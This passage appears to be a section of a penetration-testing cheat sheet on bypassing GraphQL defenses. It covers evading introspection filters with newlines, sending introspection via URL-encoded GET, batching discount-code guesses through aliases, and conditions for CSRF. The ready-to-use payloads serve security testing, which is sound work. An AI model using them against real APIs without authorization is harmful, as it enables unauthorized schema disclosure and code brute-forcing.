4. Bypass

4.1 Bypassing GraphQL Introspection Defenses

If introspection queries are disabled for the API you're testing, try inserting a special character after the __schema keyword. Developers might use a regex to exclude __schema in queries, which can be bypassed using characters like spaces, new lines, or commas.

Example: Introspection Query with Newline

{
    "query": "query{__schema
    {queryType{name}}}"
}

4.2 Use different request Methods

GET /graphql?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D

4.3 Aliased Queries

query isValidDiscount($code: Int) {
    isvalidDiscount(code:$code){
        valid
    }
    isValidDiscount2:isValidDiscount(code:$code){
        valid
    }
    isValidDiscount3:isValidDiscount(code:$code){
        valid
    }
}

4.4 CSRF

Secure POST Requests: POST requests using application/json are secure if the content type is validated.

Vulnerable Request Methods: GET requests or POST requests with x-www-form-urlencoded can leave users vulnerable to CSRF attacks.